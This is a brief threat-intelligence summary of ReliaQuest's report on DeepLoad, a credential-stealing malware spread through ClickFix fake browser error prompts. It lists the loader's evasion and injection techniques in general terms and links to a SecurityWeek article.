ReliaQuest has observed an in-the-wild campaign distributing a new malware family called DeepLoad that steals credentials and intercepts browser interactions. The campaign uses the ClickFix technique to trick users into running a persistent PowerShell loader that compiles evasive DLLs, injects into LockAppHost.exe, and facilitates real-time cryptocurrency theft. #DeepLoad #ClickFix
Keypoints
- DeepLoad was distributed using ClickFix fake browser error prompts that trick victims into executing a PowerShell command.
- The PowerShell loader persistently compiles and drops a uniquely named DLL in the Temp folder to evade detection.
- The loader disables PowerShell history and invokes Windows core functions directly to bypass monitoring hooks.
- Attackers inject the payload into LockAppHost.exe via APC injection, executing the payload in memory to avoid writing a decoded file to disk.
- DeepLoad includes a standalone credential stealer, drops a rogue browser extension to intercept sessions, and has been observed spreading via USB.
Read More: https://www.securityweek.com/new-deepload-malware-dropped-in-clickfix-attacks/